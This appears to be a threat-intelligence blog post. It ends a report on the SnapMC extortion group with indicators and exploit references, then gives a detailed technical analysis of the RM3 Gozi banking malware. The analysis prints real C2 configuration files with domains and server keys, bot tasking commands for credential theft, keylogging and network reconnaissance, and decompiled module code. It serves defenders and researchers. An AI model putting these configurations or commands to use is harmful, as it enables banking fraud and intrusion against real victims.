First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective way to prevent falling victim to these types attacks. Make sure to identify where vulnerable software resides within your network by (regularly performing) vulnerability scanning.

Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization, and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident.

Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became clear that when the software component resided behind a well configured Web Application Firewall (WAF), the exploit would be unsuccessful.

Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection, and efficient response will reduce the damage even before it materializes.

Conclusion

NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware. While in the data breach extortion attacks, most of the activity could even be automated and takes less time while still having a significant impact. Therefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.

MITRE ATT&CK mapping

Tactic Technique Procedure
Reconnaissance T1595.002 – Vulnerability scanning SnapMC used the Acunetix vulnerability scanner to find systems running vulnerable Telerik software.
Initial Access T1190 – Exploit Public Facing Application(s) SnapMC exploited CVE-2019-18935 and SQL Injection.
Privilege Escalation SnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.
Execution T1059.001 – PowerShell SnapMC used a combination of publicly available PowerShell cmdlets.
Collection T1560.001 – Archive via Utility SnapMC used 7zip to prepare data for exfiltration.
Exfiltration T1567 – Exfiltration over Web Service

T1567.002 – Exfiltration to Cloud Storage
SnapMC used MinIO client (mc.exe) to exfiltrate data.
MITRE ATT&CK

Indicators of Compromise

Type Data Notes
File location + file name C:\Windows\Temp[0-9]{10}.[0-9]{1,8}.dll
(Example: c:\Windows\Temp\1628862598.87034184.dll)
File name of dropped payload after successful Telerik exploitation; the first part is the epoch timestamp and last part is randomly generated
File location + file name C:\Windows\Temp\7za.exe 7zip archiving utility
File name s.ps1 SQL cmdlet
File name a.ps1 SQL cmdlet
File name x.ps1 SQL cmdlet
File name *.par.minio Temporary files created by MinIO during exfiltration
File location C:\Windows\Temp\Azure\ Folder for temporary files created by MinIO
File location C:\Windows\Temp\Vmware\ Folder for temporary files created by MinIO
File name mc.exe MinIO client
Hash 651ed548d2e04881d0ff24f789767c0e MD5 hash of MinIO client
Hash b4171d48df233978f8cf58081b8ad9dc51a6097f SHA1 hash of MinIO client
Hash 0a1d16e528dc1e41f01eb7c643de0dfb4e5c4a67450c4da78427a8906c70ef3e SHA265 hash of MinIO client
Indicators of Compromise

References

  1. https://nvd.nist.gov/vuln/detail/CVE-2019-18935
  2. https://github.com/noperator/CVE-2019-18935
  3. https://github.com/calebstewart/CVE-2021-1675
  4. https://github.com/d0nkeys/redteam/tree/master/privilege-escalation
  5. https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/
  6. https://github.com/gushmazuko/WinBypass
  7. https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-PrivescAudit/
  8. https://min.io/

RM3 – Curiosities of the wildest banking malware

fumik0_ & the RIFT Team

TL:DR

Our Research and Intelligence Fusion Team have been tracking the Gozi variant RM3 for close to 30 months. In this post we provide some history, analysis and observations on this most pernicious family of banking malware targeting Oceania, the UK, Germany and Italy. 

We’ll start with an overview of its origins and current operations before providing a deep dive technical analysis of the RM3 variant. 

Introduction

Despite its long and rich history in the cyber-criminal underworld, the Gozi malware family is surrounded with mystery and confusion. The leaking of its source code only increased this confusion as it led to an influx of Gozi variants across the threat landscape.  

Although most variants were only short-lived – they either disappeared or were taken down by law enforcement – a few have had greater staying power. 

Since September 2019, Fox-IT/NCC Group has intensified its research into known active Gozi variants. These are operated by a variety of threat actors (TAs) and generally cause financial losses by either direct involvement in transactional fraud, or by facilitating other types of malicious activity, such as targeted ransomware activity. 

Gozi ISFB started targeting financial institutions around 2013-2015 and hasn’t stopped since then. It is one of the few – perhaps the only – main active branches of the notorious 15 year old Gozi / CRM. Its popularity is probably due to the wide range of variants which are available and the way threat actor groups can use these for their own goals. 

In 2017, yet another new version was detected in the wild with a number of major modifications compared to the previous main variant:

  • Rebranded RM loader (called RM3
  • Used exotic PE file format exclusively designed for this banking malware 
  • Modular architecture 
  • Network communication reworked 
  • New modules 

Given the complex development history of the Gozi ISFB forks, it is difficult to say with any certainty which variant was used as the basis for RM3. This is further complicated by the many different names used by the Cyber Threat Intelligence and Anti-Virus industries for this family of malware. But if you would like to understand the rather tortured history of this particular malware a little better, the research and blog posts on the subject by Check Point are a good starting point.

Banking malware targeting mainly Europe & Oceania

With more than four years of activity, RM3 has had a significant impact on the financial fraud landscape by spreading a colossal number of campaigns, principally across two regions:

  • Oceania, to date, Australia and New Zealand are the most impacted countries in this region. Threat actors seemed to have significant experience and used traditional means to conduct fraud and theft, mainly using web injects to push fakes or replacers directly into financial websites. Some of these injectors are more advanced than the usual ones that could be seen in bankers, and suggest the operators behind them were more sophisticated and experienced.
  • Europe, targeting primarily the UK, Germany and Italy. In this region, a manual fraud strategy was generally followed which was drastically different to the approach seen in Oceania.
Two different approaches to fraud used in Europe and Oceania

It’s worth noting that ‘Elite’ in this context means highly skilled operators. The injects provided and the C&C servers are by far the most complicated and restricted ones seen up to this date in the fraud landscape.

Fox-IT/NCC Group has currently counted at least eight* RM3 infrastructures:

  • 4 in Europe
  • 2 in Oceania (that seem to be linked together based on the fact that they share the same inject configurations)
  • 1 worldwide (using AES-encryption)
  • 1 unknown

Looking back, 2019 seems to have been a golden age (at least from the malware operators’ perspective), with five operators active at the same time. This golden age came to a sudden end with a sharp decline in 2020.

RM3 timeline of active campaigns seen in the wild

Even when some RM3 controllers were not delivering any new campaigns, they were still managing their bots by pushing occasional updates and inspecting them carefully. Then, after a number of weeks, they start performing fraud on the most interesting targets. This is an extremely common pattern among bank malware operators in our experience, although the reasons for this pattern remain unclear. It may be a tactic related to maintaining stealth or it may simply be an indication of the operators lagging behind the sheer number of infections.

The global pandemic has had a noticeable impact on many types of RM3 infrastructure, as it has on all malware as a service (MaaS) operations. The widespread lockdowns as a result of the pandemic have resulted in a massive number of bots being shut down as companies closed and users were forced to work from home, in some cases using personal computers. This change in working patterns could be an explanation for what happened between Q1 & Q3 2020, when campaigns were drastically more aggressive than usual and bot infections intensified (and were also of lower quality, as if it was an emergency). The style of this operation differed drastically from the way in which RM3 operated between 2018 and 2019, when there was a partnership with a distributor actor called Sagrid.

Analysis of the separate campaigns reveals that individual campaign infrastructures are independent from each of the others and operate their own strategies:

RM3 InfraTasksInjects
Financial VNC SOCKS
UK 1 No‡ Yes Yes Yes
UK 2 Yes No No No
Italy No‡ Yes Yes Yes
Australia/NZ 1 Yes Yes No‡ No
Australia/NZ 2 Yes Yes No‡ No
RM3 .at ??? ??? ??? ???
Germany ??? ??? ??? ???
Worldwide Yes No No No

Based on the web inject configuration file from config.bin
Based on active campaign monitoring, threat actor team(s) are mainly inspecting bots to manually push extra commands like VNC module for starting fraud activities.

A robust and stable distribution routine

As with many malware processes, renewing bots is not a simple, linear thing and many elements have to be taken into consideration:

  • Malware signatures
  • Packer evading AV/EDR
  • Distribution used (ratio effectiveness)
  • Time of an active campaign before being takedown by abuse

Many channels have been used to spread this malware, with distribution by spam (malspam) the most popular – and also the most effective. Multiple distribution teams are behind these campaigns and it is difficult to identify all of them; particularly so now, given the increased professionalisation of these operations (which now can involve shorter term, contractor like relationships). As a result, while malware campaign infrastructures are separate, there is now more overlap between the various infrastructures. It is certain however that one actor known as Sagrid was definitely the most prolific distributor. Around 2018/2019, Sagrid actively spread malware in Australia and New Zealand, using advanced techniques to deliver it to their victims.

RM3 distribution over the past 4 years

The graphic below shows the distribution method of an individual piece of RM3 malware in more detail.

A simplified path of a payload from its compilation to its delivery

Interestingly, the only exploit kit seen to be involved in the distribution of RM3 has been  Spelevo – at least in our experience. These days, Exploit Kits (EK) are not as active as in their golden era in the 2010s (when Angler EK dominated the market along with Rig and Magnitude). But they are still an interesting and effective technique for gathering bots from corporate networks, where updates are complicated and so can be delayed or just not performed. In other words, if a new bot is deployed using an EK, there is a higher chance that it is part of big network than one distributed by a more ‘classic’ malspam campaign.

Strangely, to this date, RM3 has never been observed targeting financial institutions in North America. Perhaps there are just no malicious actors who want to be part of this particular mule ecosystem in that zone. Or perhaps all the malicious actors in this region are still making enough money from older strains or another banking malware.

Nowadays, there is a steady decline in banking malware in general, with most TAs joining the rising and explosive ransomware trend. It is more lucrative for bank malware gangs to stop their usual business and try to get some exclusive contracts with the ransom teams. The return on investment (ROI) of a ransom paid by a victim is significantly higher than for the whole classic money mule infrastructure. The cost and time required in money mule and inject operations are much more complex than just giving access to an affiliate and awaiting royalties.

Large number of financial institutions targeted

Fox-IT/NCC Group has identified more than 130 financial institution targeted by threat actor groups using this banking malware. As the table below shows, the scope and impact of these attacks is particularly concentrated on Oceania. This is also the only zone where loan and job websites are targeted. Of course, targeting job websites provides them with further opportunities to hire money mules more easily within their existing systems.

CountryBanksWeb ShopsJob OffersLoansCrypto Services
UK281000
IT170000
AU/NZ80~0226

A short timeline of post-pandemic changes

As we’ve already said, the pandemic has had an impact across the entire fraud landscape and forced many TAs (not just those using RM3) to drastically change their working methods. In some cases, they have shut down completely in one field and started doing something else. For RM3 TAs, as for all of us, these are indeed interesting times.

Q3 2019 – Q2 2020, Classic fraud era

Before the pandemic, the tasks pushed by RM3 were pretty standard when a bot was part of the infrastructure. The example below is a basic check for a legitimate corporate bot with an open access point for a threat actor to connect to and start to use for fraud.

GET_CREDS
GET_SYSINFO
LOAD_MODULE=mail.dll,UXA
LOAD_KEYLOG=*
LOAD_SOCKS=XXX.XXX.XXX.XXX:XXXX

Otherwise, the banking malware was configured as an advanced infostealer, designed to steal data and intercept all keyboard interactions.

GET_CREDS
LOAD_MODULE=mail.dll,UXA
LOAD_KEYLOG=*

Q4 2020 – Now, Bot Harvesting Era

Nowadays, bots are basically  removed if they are coming from old infrastructures, if they are not part of an active campaign. It’s an easy way for them for removing researcher bots

DEL_CONFIG

Otherwise, this is a classic information gathering system operation on the host and network. Which indicates TAs are following the ransomware path and declining their fraud legacy step by step.

GET_SYSINFO
RUN_CMD=net group "domain computers" /domain
RUN_CMD=net session

RM3 Configs – Invaluable threat intelligence data

RM3.AT

Around the summer of 2019, when this banking malware was at its height, an infrastructure which was very different from the standard ones first emerged. It mostly used infostealers for distribution and pushed an interesting variant of the RM3 loader.

Based on configs, similarities with the GoziAT TAs were seen. The crossovers were:

  • both infrastructure are using the .at TLD
  • subdomains and domains are using the same naming convention
  • Server ID is also different from the default one (12)
  • Default nameservers config
  • First seen when GoziAT was curiously quiet

An example loader.ini file for RM3.at is shown below:

LOADER.INI - RM3 .AT example
{
    "HOSTS": [
        "api.fiho.at",
        "t2.fiho.at"
    ],
    "NAMESERVERS": [
        "172.104.136.243",
        "8.8.4.4",
        "192.71.245.208",
        "51.15.98.97",
        "193.183.98.66",
        "8.8.8.8"
    ],
    "URI": "index.htm",
    "GROUP": "3000",
    "SERVER": "350",
    "SERVERKEY": "s2olwVg5cU7fWsec",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAPERIOD": "10"
}

As a reminder, the ISFB v2 variant called GoziAT (which technically uses the RM2 loader) uses the format shown below:

LOADER.INI - GoziAT/ISFB (RM2 Loader) 
{
    "HOSTS": [
        "api10.laptok.at/api1",
        "golang.feel500.at/api1",
        "go.in100k.at/api1"
    ],
    "GROUP": "1100",
    "SERVER": "730",
    "SERVERKEY": "F2oareSbPhCq2ch0",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "20",
    "HOSTSHIFTTIMEOUT": "1"
}

But this RM3 infrastructure disappeared just a few weeks later and has never been seen again. It is not known if the TAs were satisfied with the product and its results and it remains one of the unexplained curiosities of this banking malware

But, we can say this marked the return of GoziAT, which was back on track with intense campaigns.

Other domains related to this short lived RM3 infrastructure were.

  • api.fiho.at
  • y1.rexa.at
  • cde.frame303.at
  • api.frame303.at
  • u2.inmax.at
  • cdn5.inmax.at
  • go.maso.at
  • f1.maso.at

Standard routine for other infrastructures

Meanwhile, a classic loader config will mostly need standard data like any other malware:

  • C&C domains (called hosts on the loader side)
  • Timeout values
  • Keys

The example below shows a typical loader.ini file from a more ‘classic’ infrastructure. This one is from Germany, but similar configurations were seen in the UK1, Australia/New Zealand1 and Italian infrastructures:

LOADER.INI – DE 
{
    "HOSTS": "https://daycareforyou.xyz",
    "ADNSONLY": "0",
    "URI": "index.htm",
    "GROUP": "40000",
    "SERVER": "12",
    "SERVERKEY": "z2Ptfc0edLyV4Qxo",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAPERIOD": "10"
}

Updates to RM3 were observed to be ongoing, and more fields have appeared since the 3009XX builds (e.g: 300912, 900932):

  • Configuring the self-removing process
  • Setup the loader module as the persistent one
  • The Anti-CIS (langid field) is also making a comeback

The example below shows a typical client.ini file as seen in build 3009xx from the UK2 and Australia/New Zealand 2 infrastructures:

CLIENT.INI 
{
    "HOSTS": "https://vilecorbeanca.xyz",
    "ADNSONLY": "0",
    "URI": "index.htm",
    "GROUP": "92020291",
    "SERVER": "12",
    "SERVERKEY": "kD9eVTdi6lgpH0Ml",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "NOSCRIPT": "0",
    "NODELETE": "0",
    "NOPERSISTLOADER": "0",
    "LANGID": "RU",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGAPERIOD": "10"
}

The client.ini file mainly stores elements that will be required for the explorer.dll module:

  • Timeouts values
  • Maximum size allowed for RM3 requests to the controllers
  • Video config
  • HTTP proxy activation
CLIENT.INI - Default Format
{
    "CONTROLLER": [
        "",
    ],
    "ADNSONLY": "0",
    "IPRESOLVERS": "curlmyip.net",
    "SERVER": "12",
    "SERVERKEY": "",
    "IDLEPERIOD": "300",
    "TASKTIMEOUT": "300",
    "CONFIGTIMEOUT": "300",
    "INITIMEOUT": "300",
    "SENDTIMEOUT": "300",
    "GROUP": "",
    "HOSTKEEPTIMEOUT": "60",
    "HOSTSHIFTTIMEOUT": "60",
    "RUNCHECKTIMEOUT": "10",
    "REMOVECSP": "0",
    "LOGHTTP": "0",
    "CLEARCACHE": "1",
    "CACHECONTROL": [
        "no-cache,",
        "no-store,",
        "must-revalidate"
    ],
    "MAXPOSTLENGTH": "300000",
    "SETVIDEO": [
        "30,",
        "8,",
        "notipda"
    ],
    "HTTPCONNECTTIME": "480",
    "HTTPSENDTIME": "240",
    "HTTPRECEIVETIME": "240"
}

What next?

Active monitoring of current in-the-wild instances suggests that the RM3 TAs are progressively switching to the ransomware path. That is, they have not pushed any updates on the fraud side of their operations for a number of months (by not pushing any injects), but they are still maintaining their C&C infrastructure. All infrastructure has a cost and the fact they are maintaining their C&C infrastructure without executing traditional fraud is a strong indication they are changing their strategy to another source of income.

The tasks which are being pushed (and old ones since May 2020) are triage steps for selecting bots which could be used for internal lateral movement. This pattern of behaviour is becoming more evident everyday in the latest ongoing campaigns, where everyone seems to be targeted and the inject configurations have been totally removed.

As a reminder, over the past two years banking malware gangs in general have been seen to follow this trend. This is due to the declining fraud ecosystem in general, but also due to the increased difficulty in finding inject developers with the skills to develop effective fakes which this decline has also prompted.

How banking TAs can migrate from fraud to ransom (or any other businesses)

We consider RM3 to be the most advanced ISFB strain to date, and fraud tools can easily be switched into a malicious red team like strategy.

RM3 evolving to support two different use cases at the same time

Why is RM3 the most advanced ISFB strain?

As we said, we consider RM3 to be the most advanced ISFB variant we have seen. When we analyse the RM3 payload, there is a huge gap between it and its predecessors. There are multiple differences:

  • A new PE format called PX has been developed
  • The .bss section is slightly updated for storing RM3 static variables
  • A new structure called WD based on the J1/J2/J3/JJ ISFB File Join system for storing files
Architecture differences between ISFB v2 and RM3 payload
(main sections discussed below)

PX Format

As mentioned, RM3 is designed to work with PX payloads (Portable eXecutable). This is an exotic file format created for, and only used with, this banking malware. The structure is not very different from the original PE format, with almost all sections, data directories and section tables remaining intact. Essentially, use of the new file format just requires malware to be re-crafted correctly in a new payload at the correct offset.

PX Header

BSS section

The bss section (Block Starting Symbol) is a critical data segment used by all strains of ISFB for storing uninitiated static local variables. These variables are encrypted and used for different interactions depending on the module in use.

In a compiled payload, this section is usually named “.bss0”. But evidence from a source code leak shows that this is originally named “.bss” in the source code. These comments also make it clear that this module is encrypted.

The encrypted .bss section

This is illustrated by the source code comments shown below:

// Original section name that will be created within a file
#define CS_SECTION_NAME ".bss0"
// The section will be renamed after the encryption completes.
// This is because we cannot use reserved section names aka ".rdata" or ".bss" during compile time.
#define CS_NEW_SECTION_NAME ".bss"

When working with ISFB, it is common to see the same mechanism or routine across multiple compiled builds or variants. However, it is still necessary to analyse them all in detail because slight adjustments are frequently introduced. Understanding these minor changes can help with troubleshooting and explain why scripts don’t work. The decryption routine in the bss section is a perfect example of this; it is almost identical to ISFB v2 variants, but the RM3 developers decided to tweak it just slightly by creating an XOR key in a different way – adding a FILE_HEADER.TimeDateStamp with the gs_Cookie (this information based on the ISFB leak).

Decrypted strings from the .bss section being parsed by IDA

Occasionally, it is possible to see a debugged and compiled version of RM3 in the wild. It is unknown if this behaviour is intended for some reason or simply a mistake by TA teams, but it is a gold mine for understanding more about the underlying code.

WD Struct

ISFB has its own way of storing and using embedded files. It uses a homemade structure that seems to change its name whenever there is a new strain or a major ISFB update:

  • FJ or J1 – Old ISFB era
  • J2 – Dreambot
  • J3 – ISFB v3 (Only seen in Japan)
  • JJ – ISFB v2 (v2.14+ – now)
  • WD – RM3 / Saigon

To get a better understanding of the latest structure in use, it is worth taking a quick look back at the active strains of ISFB v2 still known to use the JJ system.

The structure is pretty rudimentary and can be summarised like this:

struct JJ_Struct {
 DWORD xor_cookie;
 DWORD crc32;
 DWORD size;
 DWORD addr;
} JJ;

With RM3, they decided to slightly rework the join file philosophy by creating a new structure called WD. This is basically just a rebranded concept; it just adds the JJ structure (seen above) and stores it as a pointer array.

The structure itself is really simple:

struct WD_Struct {
  DWORD size;
  WORD magic;
  WORD flag;
  JJ_Struct *jj;
} WD;

In allRM3 builds, these structures simply direct the malware to grab an average of at least 4 files†:

  • A PX loader
  • An RSA pubkey
  • An RM3 config
  • A wordlist that will be mainly used for create subkeys in the registry

† The amount of files is dependent on the loader stage or RM3 modules used. It is also based on the ISFB variant, as another file could be present which stores the langid value (which is basically the anti-cis feature for this banking malware).

Architecture

Every major ISFB variant has something that makes it unique in some way. For example, the notorious Dreambot was designed to work as a standalone payload; the whole loader stage walk-through was removed and bots were directly pointed at the correct controllers. This choice was mainly explained by the fact that this strain was designed to work as malware as a service. It is fairly standard right now to see malware developers developing specific features for TAs – if they are prepared to pay for them. In these agreements, TAs can be guaranteed some kind of exclusivity with a variant or feature. However, this business model does also increase the risk of misunderstanding and overlap in term of assigning ownership and responsibility. This is one of the reasons it is harder to get a clear picture of the activities happening between malware developers & TAs nowadays.

But to get back to the variant we are discussing here; RM3 pushed the ISFB modular plugin system to its maximum potential by introducing a range of elements into new modules that had never been seen before. These new modules included:

  • bl.dll
  • explorer.dll
  • rt.dll
  • netwrk.dll

These modules are linked together to recreate a modded client32.bin/client64.bin (modded from the client.bin seen in ISFB v2). This new architecture is much more complicated to debug or disassemble. In the end, however, we can split this malware into 4 main branches:

  • A modded client32.bin/client64.bin
  • A browser module designed to setup hooks and an SSL proxy (used for POST HTTP/HTTPS interception)
  • A remote shell (probably designed for initial assessments before starting lateral attacks)
  • A fraud arsenal toolkit (hidden VNC, SOCKs proxy, etc…)
RM3 Architecture

RM3 Loader –
Major ISFB update? Or just a refactored code?

The loader is a minimalist plugin that contains only the required functions for doing three main tasks:

  • Contacting a loader C&C (which is called host), downloading critical RM3 modules and storing them into the registry (bl.dll, explorer.dll, rt.dll, netwrk.dll)
  • Setting up persistence†
  • Rebooting everything and making sure it has removed itself†.
An overview of the second stage loader

These functions are summarised in the following schematic.‡

† In the 3009XX build above, a TA can decide to setup the loader as persistent itself, or remove the payload.

‡ Of course, the loader has more details than could be mentioned here, but the schematic shows the main concepts for a basic understanding.

RM3 Network beacons – Hiding the beast behind simple URIs

C&C beacon requests have been adjusted from the standard ISFB v2 ones, by simplifying the process with just two default URI. These URIs are dynamic fields that can be configured from the loader and client config. This is something that older strains are starting to follow since build 250172.

When it switches to the controller side, RM3 saves HTTPS POST requests performed by the users. These are then used to create fake but legitimate looking paths.

Changing RM3 URI path dynamically

This ingenious trick makes RM3 really hard to catch behind the telemetry generated by the bot. To make short, whenever the user is browsing websites performing those specific requests, the malware is mimicking them by replacing the domain with the controller one.

https://<controler_domain>.tld/index.html                <- default
https://<controler_domain>.tld/search/wp-content/app     <- timer cycle #1
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/admin/credentials/home    <- timer cycle #2
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/operating/static/template/index.php  <- timer cycle #3
https://<controler_domain>.tld/operating/static/template/index.php
https://<controler_domain>.tld/operating/static/template/index.php
https://<controler_domain>.tld/operating/static/template/index.php

If that wasn’t enough, the usual base64 beacons are now hidden as a data form and send by means of POST requests. When decrypted, these requests reveal this typical network communication.

random=rdm&type=1&soft=3&version=300960&user=17fe7d78280730e52b545792f07d61cb&group=21031&id=00000024&arc=0&crc=44c9058a&size=2&uptime=219&sysid=15ddce20c9691c1ff5103a921e59d7a1&os=10.0_0_0_x64 

The fields can be explained in as follows:

Field Meaning
randomA mandatory randomised value
typeData format
softNetwork communication method
versionBuild of the RM3 banking malware
userUser seed
groupCampaign ID
idRM3 Data type
arcModule with specific architecture (0 =  i386 – 1= 86_x64)
sizeStolen data size
uptimeBot uptime
sysidMachine seed
osWindows version

Soft – A curious ISFB Field

Value Stage C&C Network Communication Response Format
(< Build 300960)
Response Format
(Build 300960)
3Host (Loader)WinAPIBase64(RSA + Serpent)Base64(RSA + AES)
2Host (Loader)COMBase64(RSA + Serpent)Base64(RSA + AES)
1ControllerWinAPI/COMRSA + SerpentRSA + AES

ID – A field being updated RM3

Thanks to the source code leak, identifying the data type is not that complicated and can be determined from the field “id”

Бот отправляет на сервер файлы следующего типа и формата (тип данных задаётся параметром type в POST-запросе):
SEND_ID_UNKNOWN	0	- неизвестно, используется только для тестирования	
SEND_ID_FORM	1	- данные HTML-форм. ASCII-заголовок + форма бинарном виде, как есть
SEND_ID_FILE	2	- любой файл, так шлются найденные по маске файлы
SEND_ID_AUTH	3	- данные IE Basic Authentication, ASCII-заголовок + бинарные данные
SEND_ID_CERTS	4	- сертификаты. Файлы PFX упакованые в CAB или ZIP.
SEND_ID_COOKIES	5	- куки и SOL-файлы. Шлются со структурой каталогов. Упакованы в CAB или ZIP
SEND_ID_SYSINFO	6	- информация о системе. UTF8(16)-файл, упакованый в CAB или ZIP
SEND_ID_SCRSHOT	7	- скриншот. GIF-файл.
SEND_ID_LOG	8	- внутренний лог бота. TXT-файл.
SEND_ID_FTP	9	- инфа с грабера FTP. TXT-файл.
SEND_ID_IM	10	- инфа с грабера IM. TXT-файл.
SEND_ID_KEYLOG	11	- лог клавиатуры. TXT-файл.
SEND_ID_PAGE_REP 12	- нотификация о полной подмене страницы TXT-файл.
SEND_ID_GRAB	13	- сграбленый фрагмент контента. ASCII заголовок + контент, как он есть

Over time, they have created more fields:

New CommandIDDescription
SEND_ID_CMD19Results from the CMD_RUN command
SEND_ID_???20
SEND_ID_CRASH21Crash dump
SEND_ID_HTTP22Send HTTP Logs
SEND_ID_ACC23Send credentials
SEND_ID_ANTIVIRUS24Send Antivirus info

Module list

Analysis indicates that any RM3 instance would have to include at least the following modules:

CRCModule NamePE FormatStageDescription
MZ1st stage RM3 loader
0xc535d8bfloader.dllPX2nd stage RM3 loader
MZRM3 Startup module hidden in the shellcode
0x8576b0d0bl.dllPXHostRM3 Background Loader
0x224c6c42explorer.dllPXHostRM3 Mastermind
0xd6306e08rt.dllPXHostRM3 Runtime DLL – RM3 WinAPI/COM Module
0x45a0fcd0netwrk.dllPXHostRM3 Network API
0xe6954637browser.dllPXControllerBrowser Grabber/HTTPS Interception
0x5f92dac2iexplore.dllPXControllerInternet explorer Hooking module
0x309d98fffirefox.dllPXControllerFirefox Hooking module
0x309d98ffmicrosoftedgecp.dllPXControllerMicrosoft Edge Hooking module (old one)
0x9eff4536chrome.dllPXControllerGoogle chrome Hooking module
0x7b41e687msedge.dllPXControllerMicrosoft Edge Hooking module (Chromium one)
0x27ed1635keylog.dllPXControllerKeylogging module
0x6bb59728mail.dllPXControllerMail Grabber module
0x1c4f452avnc.dllPXControllerVNC module
0x970a7584sqlite.dllPXControllerSQLITE Library required for some module
0xfe9c154bftp.dllPXControllerFTP module
0xd9839650socks.dllPXControllerSocks module
0x1f8fde6bcmdshell.dllPXControllerPersistent remote shell module

Additionally, more configuration files ( .ini ) are used to store all the critical information implemented in RM3. Four different files are currently known:

CRC Name
0x8fb1dde1loader.ini
0x68c8691cexplorer.ini
0xd722afcbclient.ini†
0x68c8691cvnc.ini

† CLIENT.INI is never intended to be seen in an RM3 binary, as it is intended to be received by the loader C&C (aka “the host”, based on its field name on configs). This is completely different from older ISFB strains, where the client.ini is stored in the client32.bin/client64.bin. So it means, if the loader c&c is offline, there is no option to get this crucial file

Moving this file is a clever move by the RM3 malware developers and the TAs using it as they have reduced the risk of having researcher bots in their ecosystem.

RM3 dependency madness

With client32.bin (from the more standard ISFB v2 form) technically not present itself but instead implemented as an accumulation of modules injected into a process, RM3 is drastically different from its predecessors. It has totally changed its micro-ecosystem by forcing all of its modules to interact with each other (except bl.dll) and as shown below.

All interactions between RM3 modules

These changes also slow down any in-depth analysis, as they make it way harder to analyse as a standalone module.

External calls from other RM3 modules (8576b0d0 and e695437)

RM3 Module 101

Thanks to the startup module launched by start.ps1 in the registry, a hidden shell worker is plugged into explorer.exe (not the explorer.dll module) that initialises a hooking instance for specific WinAPI/COM calls. This allows the banking malware to inject all its components into every child process coming from that Windows process. This strategy permits RM3 to have total control of all user interactions.

(*) PoV = Point of View

Looking at DllMain, the code hasn’t changed that much in the years since the ISFB leak.

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  BOOL Ret = TRUE;
  WINERROR Status = NO_ERROR;

  Ret = 1;
  if ( ul_reason_for_call ) {
    if ( ul_reason_for_call == 1 && _InterlockedIncrement(&g_AttachCount) == 1 ) {
      Status = ModuleStartup(hModule, lpReserved); // <- Main call 
      if ( Status ) {
        SetLastError(Status);
        Ret = 0;
      }
    }
  }
  else if ( !_InterlockedExchangeAdd(&g_AttachCount, 0xFFFFFFFF) ) {
    ModuleCleanup();
  }
  return Ret;
}

It is only when we get to the ModuleStartup call that things start to become interesting. This code has been refactored and adjusted to the RM3 philosophy:

static WINERROR ModuleStartup(HMODULE hModule) {
    WINERROR Status; 
    RM3_Struct RM3;

    // Need mandatory RM3 Struct Variable, that contains everything
    // By calling an export function from BL.DLL
	RM3 = bl!GetRM3Struct();  

    // Decrypting the .bss section
    // CsDecryptSection is the supposed name based on ISFB leak
	Status = bl!CsDecryptSection(hModule, 0);
  
    if ( (gs_Cookie ^ RM3->dCrc32ExeName) == PROCESSNAMEHASH )
    	Status = Startup() 
	
    return(Status);
}

This adjustment is pretty similar in all modules and can be summarised as three main steps:

  • Requesting from bl.dll a critical global structure (called RM3_struct for the purpose of this article) which has the minimal requirements for running the injected code smoothly. The structure itself changes based on which module it is. For example, bl.dll mostly uses it for recreating values that seem to be part of the PEB (hypothesis); explorer.dll uses this structure for storing timeout values and browsers.dll uses it for RM3 injects configurations.
  • Decrypting the .bss section.
  • Entering into the checking routine by using an ingenious mechanism:
    • The filename of the child process is converted into a JamCRC32 hash and compared with the one stored in the startup function. If it matches, the module starts its worker routine, otherwise it quits.

These are a just a few particular cases, but the philosophy of the RM3 Module startup is well represented here. It is a simple and clever move for monitoring user interactions, because it has control over everything coming from explorer.exe.

bl.dll – The backbone of RM3

The background loader is almost nothing and everything at the same time. It’s the root of the whole RM3 infrastructure when it’s fully installed and configured by the initial loader. Its focus is mainly to initialise RM3_Struct and permits and provides a fundamental RM3 API to all other modules:

Ordinal    | Goal 
==========================================
856b0d0_1  | bl!GetBuild
856b0d0_2  | bl!GetRM3Struct
856b0d0_3  | bl!WaitForSingleObject
856b0d0_4  | bl!GenerateRNG
856b0d0_5  | bl!GenerateGUIDName
856b0d0_6  | bl!XorshiftStar
856b0d0_7  | bl!GenerateFieldName
856b0d0_8  | bl!GenerateCRC32Checksum
856b0d0_9  | bl!WaitForMultipleObjects
856b0d0_10 | bl!HeapAlloc
856b0d0_11 | bl!HeapFree
856b0d0_12 | bl!HeapReAlloc
856b0d0_13 | bl!???
